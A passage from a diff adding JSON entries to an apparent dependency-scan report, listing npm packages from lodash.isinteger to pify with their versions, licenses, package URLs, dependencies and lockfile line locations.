"Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6816, + "EndLine": 6821 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isinteger@4.0.4", + "Name": "lodash.isinteger", + "Identifier": { + "PURL": "pkg:npm/lodash.isinteger@4.0.4", + "UID": "a89cb36bce2d66ab" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6822, + "EndLine": 6827 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isnumber@3.0.3", + "Name": "lodash.isnumber", + "Identifier": { + "PURL": "pkg:npm/lodash.isnumber@3.0.3", + "UID": "62f5d5cc4f6353bb" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6828, + "EndLine": 6833 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isplainobject@4.0.6", + "Name": "lodash.isplainobject", + "Identifier": { + "PURL": "pkg:npm/lodash.isplainobject@4.0.6", + "UID": "f2ebf827bb5a6165" + }, + "Version": "4.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6834, + "EndLine": 6839 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.isstring@4.0.1", + "Name": "lodash.isstring", + "Identifier": { + "PURL": "pkg:npm/lodash.isstring@4.0.1", + "UID": "85dd7bd51409e649" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6840, + "EndLine": 6845 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lodash.once@4.1.1", + "Name": "lodash.once", + "Identifier": { + "PURL": "pkg:npm/lodash.once@4.1.1", + "UID": "87d9acafe05e83bd" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6853, + "EndLine": 6858 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "long@5.3.2", + "Name": "long", + "Identifier": { + "PURL": "pkg:npm/long@5.3.2", + "UID": "3550fa92d6346ba2" + }, + "Version": "5.3.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6859, + "EndLine": 6865 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "loose-envify@1.4.0", + "Name": "loose-envify", + "Identifier": { + "PURL": "pkg:npm/loose-envify@1.4.0", + "UID": "e5f7a9a038bfd9b7" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "js-tokens@4.0.0" + ], + "Locations": [ + { + "StartLine": 6866, + "EndLine": 6877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@10.4.3", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@10.4.3", + "UID": "97517bd840db192e" + }, + "Version": "10.4.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7713, + "EndLine": 7718 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-cache@6.0.0", + "Name": "lru-cache", + "Identifier": { + "PURL": "pkg:npm/lru-cache@6.0.0", + "UID": "13c0c9ca03237570" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 6888, + "EndLine": 6899 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lru-memoizer@2.3.0", + "Name": "lru-memoizer", + "Identifier": { + "PURL": "pkg:npm/lru-memoizer@2.3.0", + "UID": "395282642de029d2" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lodash.clonedeep@4.5.0", + "lru-cache@6.0.0" + ], + "Locations": [ + { + "StartLine": 6900, + "EndLine": 6909 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "lucide-react@0.376.0", + "Name": "lucide-react", + "Identifier": { + "PURL": "pkg:npm/lucide-react@0.376.0", + "UID": "86cd179a2e47f5ad" + }, + "Version": "0.376.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react@18.3.1" + ], + "Locations": [ + { + "StartLine": 6910, + "EndLine": 6918 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "math-intrinsics@1.1.0", + "Name": "math-intrinsics", + "Identifier": { + "PURL": "pkg:npm/math-intrinsics@1.1.0", + "UID": "dad0c520e0c4c251" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6936, + "EndLine": 6944 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "media-engine@1.0.3", + "Name": "media-engine", + "Identifier": { + "PURL": "pkg:npm/media-engine@1.0.3", + "UID": "83ad3940984e5ba0" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6945, + "EndLine": 6950 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "media-typer@0.3.0", + "Name": "media-typer", + "Identifier": { + "PURL": "pkg:npm/media-typer@0.3.0", + "UID": "f60a9757197fc5e8" + }, + "Version": "0.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6951, + "EndLine": 6959 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "merge-descriptors@1.0.3", + "Name": "merge-descriptors", + "Identifier": { + "PURL": "pkg:npm/merge-descriptors@1.0.3", + "UID": "a0bc67e6d62b78c1" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6960, + "EndLine": 6968 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "merge2@1.4.1", + "Name": "merge2", + "Identifier": { + "PURL": "pkg:npm/merge2@1.4.1", + "UID": "20fea557152f8479" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6976, + "EndLine": 6984 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "methods@1.1.2", + "Name": "methods", + "Identifier": { + "PURL": "pkg:npm/methods@1.1.2", + "UID": "957eb486393ca9af" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6985, + "EndLine": 6993 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "micromatch@4.0.8", + "Name": "micromatch", + "Identifier": { + "PURL": "pkg:npm/micromatch@4.0.8", + "UID": "9df7f123bc92cfff" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "braces@3.0.3", + "picomatch@2.3.2" + ], + "Locations": [ + { + "StartLine": 6994, + "EndLine": 7006 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime@1.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@1.6.0", + "UID": "21560e86ca147824" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8843, + "EndLine": 8854 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime@3.0.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@3.0.0", + "UID": "e32b647e171b7380" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7007, + "EndLine": 7019 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime-db@1.52.0", + "Name": "mime-db", + "Identifier": { + "PURL": "pkg:npm/mime-db@1.52.0", + "UID": "2ce5f194533d6173" + }, + "Version": "1.52.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7020, + "EndLine": 7028 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime-types@2.1.35", + "Name": "mime-types", + "Identifier": { + "PURL": "pkg:npm/mime-types@2.1.35", + "UID": "65afcc106284429d" + }, + "Version": "2.1.35", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-db@1.52.0" + ], + "Locations": [ + { + "StartLine": 7029, + "EndLine": 7040 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimatch@9.0.9", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@9.0.9", + "UID": "324892524ef5351a" + }, + "Version": "9.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@2.1.0" + ], + "Locations": [ + { + "StartLine": 4741, + "EndLine": 4755 + }, + { + "StartLine": 6532, + "EndLine": 6546 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minimist@1.2.8", + "Name": "minimist", + "Identifier": { + "PURL": "pkg:npm/minimist@1.2.8", + "UID": "28ad7020fdd2e3a1" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7067, + "EndLine": 7075 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "minipass@7.1.3", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@7.1.3", + "UID": "40d1ab7ea826c5ef" + }, + "Version": "7.1.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7076, + "EndLine": 7084 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mkdirp@0.5.6", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@0.5.6", + "UID": "37fbd69b14cc53c5" + }, + "Version": "0.5.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minimist@1.2.8" + ], + "Locations": [ + { + "StartLine": 7085, + "EndLine": 7096 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "morgan@1.10.1", + "Name": "morgan", + "Identifier": { + "PURL": "pkg:npm/morgan@1.10.1", + "UID": "4599b2b7fb127375" + }, + "Version": "1.10.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "basic-auth@2.0.1", + "debug@2.6.9", + "depd@2.0.0", + "on-finished@2.3.0", + "on-headers@1.1.0" + ], + "Locations": [ + { + "StartLine": 7117, + "EndLine": 7132 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ms@2.0.0", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.0.0", + "UID": "696342f7975a90f8" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3709, + "EndLine": 3714 + }, + { + "StartLine": 5283, + "EndLine": 5288 + }, + { + "StartLine": 5486, + "EndLine": 5491 + }, + { + "StartLine": 7142, + "EndLine": 7147 + }, + { + "StartLine": 8837, + "EndLine": 8842 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "f122486c1e8651db" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7160, + "EndLine": 7165 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "multer@1.4.5-lts.2", + "Name": "multer", + "Identifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "Version": "1.4.5-lts.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "append-field@1.0.0", + "busboy@1.6.0", + "concat-stream@1.6.2", + "mkdirp@0.5.6", + "object-assign@4.1.1", + "type-is@1.6.18", + "xtend@4.0.2" + ], + "Locations": [ + { + "StartLine": 7166, + "EndLine": 7184 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mz@2.7.0", + "Name": "mz", + "Identifier": { + "PURL": "pkg:npm/mz@2.7.0", + "UID": "aa35088acdc0d8ed" + }, + "Version": "2.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "any-promise@1.3.0", + "object-assign@4.1.1", + "thenify-all@1.6.0" + ], + "Locations": [ + { + "StartLine": 7185, + "EndLine": 7195 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nanoid@3.3.11", + "Name": "nanoid", + "Identifier": { + "PURL": "pkg:npm/nanoid@3.3.11", + "UID": "136a8cbbf8f62ade" + }, + "Version": "3.3.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7196, + "EndLine": 7213 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "negotiator@0.6.3", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.3", + "UID": "aab82128daefade6" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7221, + "EndLine": 7229 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "next@14.2.3", + "Name": "next", + "Identifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@next/env@14.2.3", + "@next/swc-darwin-arm64@14.2.3", + "@next/swc-darwin-x64@14.2.3", + "@next/swc-linux-arm64-gnu@14.2.3", + "@next/swc-linux-arm64-musl@14.2.3", + "@next/swc-linux-x64-gnu@14.2.3", + "@next/swc-linux-x64-musl@14.2.3", + "@next/swc-win32-arm64-msvc@14.2.3", + "@next/swc-win32-ia32-msvc@14.2.3", + "@next/swc-win32-x64-msvc@14.2.3", + "@opentelemetry/api@1.9.1", + "@swc/helpers@0.5.5", + "busboy@1.6.0", + "caniuse-lite@1.0.30001791", + "graceful-fs@4.2.11", + "postcss@8.4.31", + "react-dom@18.3.1", + "react@18.3.1", + "styled-jsx@5.1.1" + ], + "Locations": [ + { + "StartLine": 7230, + "EndLine": 7280 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-cron@3.0.3", + "Name": "node-cron", + "Identifier": { + "PURL": "pkg:npm/node-cron@3.0.3", + "UID": "a55af158ab6791a8" + }, + "Version": "3.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "uuid@8.3.2" + ], + "Locations": [ + { + "StartLine": 7319, + "EndLine": 7330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-fetch@2.7.0", + "Name": "node-fetch", + "Identifier": { + "PURL": "pkg:npm/node-fetch@2.7.0", + "UID": "a0aace87e54d8c18" + }, + "Version": "2.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "whatwg-url@5.0.0" + ], + "Locations": [ + { + "StartLine": 7341, + "EndLine": 7360 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-forge@1.4.0", + "Name": "node-forge", + "Identifier": { + "PURL": "pkg:npm/node-forge@1.4.0", + "UID": "255c056a133e1e9e" + }, + "Version": "1.4.0", + "Licenses": [ + "(BSD-3-Clause OR GPL-2.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7361, + "EndLine": 7369 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "node-releases@2.0.38", + "Name": "node-releases", + "Identifier": { + "PURL": "pkg:npm/node-releases@2.0.38", + "UID": "f1acf134e6c7e346" + }, + "Version": "2.0.38", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7370, + "EndLine": 7375 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nodemailer@6.10.1", + "Name": "nodemailer", + "Identifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "Version": "6.10.1", + "Licenses": [ + "MIT-0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7376, + "EndLine": 7384 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "nopt@7.2.1", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@7.2.1", + "UID": "16f512d219919253" + }, + "Version": "7.2.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abbrev@2.0.0" + ], + "Locations": [ + { + "StartLine": 7385, + "EndLine": 7399 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "normalize-path@3.0.0", + "Name": "normalize-path", + "Identifier": { + "PURL": "pkg:npm/normalize-path@3.0.0", + "UID": "8bb3455d7b2538ee" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7400, + "EndLine": 7408 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "normalize-svg-path@1.1.0", + "Name": "normalize-svg-path", + "Identifier": { + "PURL": "pkg:npm/normalize-svg-path@1.1.0", + "UID": "b319a941cd009f1a" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "svg-arc-to-cubic-bezier@3.2.0" + ], + "Locations": [ + { + "StartLine": 7409, + "EndLine": 7417 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "object-assign@4.1.1", + "Name": "object-assign", + "Identifier": { + "PURL": "pkg:npm/object-assign@4.1.1", + "UID": "e8db72cee55f18e8" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7447, + "EndLine": 7455 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "object-hash@3.0.0", + "Name": "object-hash", + "Identifier": { + "PURL": "pkg:npm/object-hash@3.0.0", + "UID": "ffc9df41e98ed621" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7456, + "EndLine": 7464 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "object-inspect@1.13.4", + "Name": "object-inspect", + "Identifier": { + "PURL": "pkg:npm/object-inspect@1.13.4", + "UID": "8cd8e4fad052d730" + }, + "Version": "1.13.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7465, + "EndLine": 7476 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-finished@2.3.0", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.3.0", + "UID": "45cb1d2ea8b1f9ff" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 7148, + "EndLine": 7159 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-finished@2.4.1", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.4.1", + "UID": "ebb24fe42ba4772a" + }, + "Version": "2.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 7477, + "EndLine": 7488 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "on-headers@1.1.0", + "Name": "on-headers", + "Identifier": { + "PURL": "pkg:npm/on-headers@1.1.0", + "UID": "c5d2e2465151b642" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7489, + "EndLine": 7497 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "once@1.4.0", + "Name": "once", + "Identifier": { + "PURL": "pkg:npm/once@1.4.0", + "UID": "cbfbf587f38d05b" + }, + "Version": "1.4.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "wrappy@1.0.2" + ], + "Locations": [ + { + "StartLine": 7498, + "EndLine": 7507 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "otplib@12.0.1", + "Name": "otplib", + "Identifier": { + "PURL": "pkg:npm/otplib@12.0.1", + "UID": "776135e14785ec17" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@otplib/core@12.0.1", + "@otplib/preset-default@12.0.1", + "@otplib/preset-v11@12.0.1" + ], + "Locations": [ + { + "StartLine": 7542, + "EndLine": 7552 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-limit@2.3.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@2.3.0", + "UID": "9e64192ed02b9ac0" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-try@2.2.0" + ], + "Locations": [ + { + "StartLine": 8206, + "EndLine": 8220 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-limit@3.1.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@3.1.0", + "UID": "292b088aef2a13be" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yocto-queue@0.1.0" + ], + "Locations": [ + { + "StartLine": 7553, + "EndLine": 7568 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-locate@4.1.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@4.1.0", + "UID": "67a8877055feb02e" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@2.3.0" + ], + "Locations": [ + { + "StartLine": 8221, + "EndLine": 8232 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "p-try@2.2.0", + "Name": "p-try", + "Identifier": { + "PURL": "pkg:npm/p-try@2.2.0", + "UID": "888cfeca07a6fa9" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7585, + "EndLine": 7593 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "package-json-from-dist@1.0.1", + "Name": "package-json-from-dist", + "Identifier": { + "PURL": "pkg:npm/package-json-from-dist@1.0.1", + "UID": "58b0ffcf1de276b9" + }, + "Version": "1.0.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7594, + "EndLine": 7599 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pako@0.2.9", + "Name": "pako", + "Identifier": { + "PURL": "pkg:npm/pako@0.2.9", + "UID": "6a5e356a14ccc056" + }, + "Version": "0.2.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10146, + "EndLine": 10151 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pako@1.0.11", + "Name": "pako", + "Identifier": { + "PURL": "pkg:npm/pako@1.0.11", + "UID": "9e45c26f41a17898" + }, + "Version": "1.0.11", + "Licenses": [ + "(MIT AND Zlib)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7600, + "EndLine": 7605 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parse-svg-path@0.1.2", + "Name": "parse-svg-path", + "Identifier": { + "PURL": "pkg:npm/parse-svg-path@0.1.2", + "UID": "b3f4d5efa4bcf2b0" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7619, + "EndLine": 7624 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parseley@0.12.1", + "Name": "parseley", + "Identifier": { + "PURL": "pkg:npm/parseley@0.12.1", + "UID": "f209a070b68b80a9" + }, + "Version": "0.12.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "leac@0.6.0", + "peberminta@0.9.0" + ], + "Locations": [ + { + "StartLine": 7625, + "EndLine": 7637 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "parseurl@1.3.3", + "Name": "parseurl", + "Identifier": { + "PURL": "pkg:npm/parseurl@1.3.3", + "UID": "c6495bf0752e80c1" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7638, + "EndLine": 7646 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-exists@4.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@4.0.0", + "UID": "e5c3eee35b22deed" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7647, + "EndLine": 7655 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-expression-matcher@1.5.0", + "Name": "path-expression-matcher", + "Identifier": { + "PURL": "pkg:npm/path-expression-matcher@1.5.0", + "UID": "c0d21769c71dee35" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7656, + "EndLine": 7671 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-key@3.1.1", + "Name": "path-key", + "Identifier": { + "PURL": "pkg:npm/path-key@3.1.1", + "UID": "bfb38d2c0d2ed1df" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7682, + "EndLine": 7690 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-parse@1.0.7", + "Name": "path-parse", + "Identifier": { + "PURL": "pkg:npm/path-parse@1.0.7", + "UID": "94fa1bd0faea0f9f" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7691, + "EndLine": 7696 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-scurry@1.11.1", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@1.11.1", + "UID": "f15c8defba55e272" + }, + "Version": "1.11.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@10.4.3", + "minipass@7.1.3" + ], + "Locations": [ + { + "StartLine": 7697, + "EndLine": 7712 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "path-to-regexp@0.1.13", + "Name": "path-to-regexp", + "Identifier": { + "PURL": "pkg:npm/path-to-regexp@0.1.13", + "UID": "c16fd53d5cb00ad1" + }, + "Version": "0.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7719, + "EndLine": 7724 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "peberminta@0.9.0", + "Name": "peberminta", + "Identifier": { + "PURL": "pkg:npm/peberminta@0.9.0", + "UID": "f4de49b780f87831" + }, + "Version": "0.9.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7742, + "EndLine": 7750 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picocolors@1.1.1", + "Name": "picocolors", + "Identifier": { + "PURL": "pkg:npm/picocolors@1.1.1", + "UID": "d306ee73db806073" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7751, + "EndLine": 7756 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picomatch@2.3.2", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@2.3.2", + "UID": "97d39b7f6f0108b4" + }, + "Version": "2.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7757, + "EndLine": 7768 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "picomatch@4.0.4", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@4.0.4", + "UID": "160046dedbc75743" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9682, + "EndLine": 9693 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pify@2.3.0", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@2.3.0", + "UID": "b2815c7b3263e1df" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + 